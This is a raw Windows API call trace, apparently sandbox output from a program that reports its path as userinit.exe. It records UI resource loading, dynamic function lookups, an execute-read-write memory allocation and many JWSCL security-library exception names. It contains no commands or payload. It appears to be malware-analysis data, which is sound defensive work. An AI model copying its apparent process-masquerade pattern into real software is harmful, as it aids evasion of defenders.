[0170.531] LoadCursorA (hInstance=0x27f0000, lpCursorName=0x7ffc) returned 0xd021d
[0170.531] LoadCursorA (hInstance=0x27f0000, lpCursorName=0x7ffd) returned 0xd0219
[0170.532] LoadCursorA (hInstance=0x27f0000, lpCursorName=0x7fff) returned 0xe0217
[0170.532] LoadCursorA (hInstance=0x27f0000, lpCursorName=0x7ffe) returned 0xd0215
[0170.532] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0170.532] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0170.532] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0170.532] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0170.532] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0170.532] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0170.532] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0170.532] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0170.532] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0170.532] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0170.532] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0170.532] GetDC (hWnd=0x0) returned 0x6f01071a
[0170.532] GetDeviceCaps (hdc=0x6f01071a, index=90) returned 96
[0170.532] ReleaseDC (hWnd=0x0, hDC=0x6f01071a) returned 1
[0170.532] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0170.532] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x2849a60, dwData=0x291156c) returned 1
[0170.533] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0xaf3ab, fWinIni=0x0 | out: pvParam=0xaf3ab) returned 1
[0170.533] CreateFontIndirectA (lplf=0xaf3ab) returned 0x8f0a0858
[0170.533] GetObjectA (in: h=0x8f0a0858, c=60, pv=0xaf19c | out: pv=0xaf19c) returned 60
[0170.533] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0xaf257, fWinIni=0x0 | out: pvParam=0xaf257) returned 1
[0170.533] CreateFontIndirectA (lplf=0xaf333) returned 0x880a0835
[0170.533] GetObjectA (in: h=0x880a0835, c=60, pv=0xaf19c | out: pv=0xaf19c) returned 60
[0170.533] CreateFontIndirectA (lplf=0xaf2f7) returned 0x270a0877
[0170.533] GetObjectA (in: h=0x270a0877, c=60, pv=0xaf19c | out: pv=0xaf19c) returned 60
[0170.533] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0170.533] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xaf30b, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0170.533] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0xaf30b | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0170.533] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x160000
[0170.534] GetKeyboardLayoutList (in: nBuff=64, lpList=0xaf28c | out: lpList=0xaf28c) returned 1
[0170.535] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0170.535] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0170.535] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d720000
[0170.535] GetProcAddress (hModule=0x6d720000, lpProcName="InitializeFlatSB") returned 0x6d75266f
[0170.535] GetProcAddress (hModule=0x6d720000, lpProcName="UninitializeFlatSB") returned 0x6d752542
[0170.536] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollProp") returned 0x6d751d29
[0170.536] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollProp") returned 0x6d75238d
[0170.536] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7520c9
[0170.536] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d751fdb
[0170.536] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollRange") returned 0x6d751e8d
[0170.536] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d751f0f
[0170.536] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollPos") returned 0x6d751ccd
[0170.536] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollPos") returned 0x6d75216d
[0170.536] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7522be
[0170.536] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7521e2
[0170.536] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0170.537] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0170.537] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0170.537] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0170.537] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0170.537] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0170.537] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0170.537] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0170.537] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0170.537] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0170.537] LoadStringA (in: hInstance=0x27f0000, uID=0xff59, lpBuffer=0xaefec, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0170.537] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0170.537] LoadStringA (in: hInstance=0x27f0000, uID=0xff5a, lpBuffer=0xaefec, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0170.537] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0170.537] LoadStringA (in: hInstance=0x27f0000, uID=0xff5b, lpBuffer=0xaefec, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0170.537] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0170.537] LoadStringA (in: hInstance=0x27f0000, uID=0xff5c, lpBuffer=0xaefec, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0170.537] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0170.537] SetErrorMode (uMode=0x8000) returned 0x1
[0170.537] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d800000
[0170.540] SetErrorMode (uMode=0x1) returned 0x8000
[0170.540] GetProcAddress (hModule=0x6d800000, lpProcName="OleCreatePropertyFrame") returned 0x6d8020ea
[0170.540] GetProcAddress (hModule=0x6d800000, lpProcName="OleCreateFontIndirect") returned 0x6d8020b7
[0170.540] GetProcAddress (hModule=0x6d800000, lpProcName="OleCreatePictureIndirect") returned 0x6d8020c8
[0170.540] GetProcAddress (hModule=0x6d800000, lpProcName="OleLoadPicture") returned 0x6d8020d9
[0170.540] SysReAllocStringLen (in: pbstr=0x28dfa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x28dfa98*="EJwsclUnsupportedException") returned 1
[0170.540] SysReAllocStringLen (in: pbstr=0x28dfa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x28dfa80*="EJwsclPIDException") returned 1
[0170.540] SysReAllocStringLen (in: pbstr=0x28dfa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x28dfa68*="EJwsclJwShellExecuteException") returned 1
[0170.540] SysReAllocStringLen (in: pbstr=0x28dfa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x28dfa50*="EJwsclShellExecuteException") returned 1
[0170.540] SysReAllocStringLen (in: pbstr=0x28dfa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x28dfa38*="EJwsclElevationException") returned 1
[0170.540] SysReAllocStringLen (in: pbstr=0x28dfa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x28dfa20*="EJwsclAbortException") returned 1
[0170.540] SysReAllocStringLen (in: pbstr=0x28dfa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x28dfa08*="EJwsclSuRunErrorException") returned 1
[0170.540] SysReAllocStringLen (in: pbstr=0x28df9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x28df9f0*="EJwsclElevateProcessException") returned 1
[0170.540] SysReAllocStringLen (in: pbstr=0x28df9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x28df9d8*="EJwsclCertApiException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x28df9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x28df9a8*="EJwsclInvalidStartupInfo") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x28df990*="EJwsclFirewallNoExceptionsException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x28df978*="EJwsclFirewallInactiveException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x28df960*="EJwsclFirewallDelRuleException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x28df948*="EJwsclAddUdpPortToFirewallException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x28df930*="EJwsclAddTcpPortToFirewallException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x28df918*="EJwsclFirewallAddRuleException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x28df900*="EJwsclSetRemoteAdminAdressException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x28df8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x28df8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x28df8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x28df8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x28df888*="EJwsclGetIncomingPingAllowedException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x28df870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x28df858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x28df840*="EJwsclGetFWStateException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x28df828*="EJwsclSetFWStateException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x28df810*="EJwsclFirewallProfileInitException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x28df7f8*="EJwsclFirewallInitException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x28df7e0*="EJwsclGenericFirewallException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x28df7c8*="EJwsclEnumerateProcessFailed") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x28df7b0*="EJwsclInvalidRegistryPath") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x28df798*="EJwsclEndOfStream") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x28df780*="EJwsclClassTypeMismatch") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x28df768*="EJwsclInvalidHandle") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x28df750*="EJwsclInvalidIndex") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x28df738*="EJwsclInvalidSession") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x28df720*="EJwsclMissingEvent") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x28df708*="EJwsclInvalidPointerType") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x28df6f0*="EJwsclCreateProcessFailed") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x28df6d8*="EJwsclNilPointer") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x28df6c0*="EJwsclUnimplemented") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x28df6a8*="EJwsclInitWellKnownException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x28df690*="EJwsclKeyApiException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x28df678*="EJwsclKeyException") returned 1
[0170.541] SysReAllocStringLen (in: pbstr=0x28df660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x28df660*="EJwsclHashApiException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x28df648*="EJwsclHashException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x28df630*="EJwsclCSPApiException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x28df618*="EJwsclCSPException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x28df600*="EJwsclTerminalSessionException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x28df5e8*="EJwsclTerminalServiceNecessary") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x28df5d0*="EJwsclTerminalServiceException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x28df5b8*="EJwsclTerminalServerConnectException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x28df5a0*="EJwsclTerminalServerException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x28df588*="EJwsclCryptUnsupportedException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x28df570*="EJwsclCryptApiException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x28df558*="EJwsclCryptException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x28df540*="EJwsclOSError") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x28df528*="EJwsclResourceInitFailed") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x28df510*="EJwsclResourceUnequalCount") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x28df4f8*="EJwsclResourceNotFound") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x28df4e0*="EJwsclResourceException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x28df4c8*="EJwsclFailedAddACE") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x28df4b0*="EJwsclUnsupportedACE") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x28df498*="EJwsclOpenWindowStationException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x28df480*="EJwsclWindowStationException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x28df468*="EJwsclCloseDesktopException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x28df450*="EJwsclCreateDesktopException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x28df438*="EJwsclOpenDesktopException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x28df420*="EJwsclDesktopException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x28df408*="EJwsclSACLAccessDenied") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x28df3f0*="EJwsclAccessDenied") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x28df3d8*="EJwsclLSAException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x28df3c0*="ESetOwnerException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x28df3a8*="ESetSecurityException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x28df390*="EJwsclInvalidParentDescriptor") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x28df378*="EJwsclInvalidKeyPath") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x28df360*="EJwsclInvalidGenericAccessMask") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x28df348*="EJwsclAdaptSecurityInfoException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x28df330*="EJwsclThreadException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x28df318*="EJwsclInvalidObjectException") returned 1
[0170.542] SysReAllocStringLen (in: pbstr=0x28df300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x28df300*="EJwsclSecurityObjectException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x28df2e8*="EJwsclHashMismatch") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x28df2d0*="EJwsclStreamHashException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x28df2b8*="EJwsclStreamInvalidMagicException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x28df2a0*="EJwsclStreamSizeException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x28df288*="EJwsclStreamException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x28df270*="EJwsclNoSuchLogonSession") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x28df258*="EJwsclInvalidFlagsException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x28df240*="EJwsclProcessNotFound") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x28df228*="EJwsclInvalidParameterException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x28df210*="EJwsclInvalidPathException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x28df1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x28df1e0*="EJwsclInvalidRevision") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x28df1c8*="EJwsclInvalidAceMismatch") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x28df1b0*="EJwsclRevisionMismatchException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x28df198*="EJwsclInvalidACEException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x28df180*="EJwsclReadOnlyPropertyException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x28df168*="EJwsclDuplicateListEntryException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x28df150*="EJwsclIndexOutOfBoundsException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x28df138*="EJwsclInvalidSidAuthorityValue") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x28df120*="EJwsclInvalidKnownSIDException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x28df108*="EJwsclInvalidComputer") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x28df0f0*="EJwsclInvalidGroupSIDException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x28df0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x28df0c0*="EJwsclInvalidSIDException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x28df0a8*="EJwsclInvalidSecurityListException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x28df090*="EJwsclInvalidMandatoryLevelException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x28df078*="EJwsclEmptyACLException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x28df060*="EJwsclNILParameterException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x28df048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x28df030*="EJwsclInvalidObjectArrayException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x28df018*="EJwsclProcessIdNotAvailable") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28df000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x28df000*="EJwsclWinCallFailedException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28defe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x28defe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0170.543] SysReAllocStringLen (in: pbstr=0x28defd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x28defd0*="EJwsclNotImplementedException") returned 1
[0170.544] SysReAllocStringLen (in: pbstr=0x28defb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x28defb8*="EJwsclAccessTypeException") returned 1
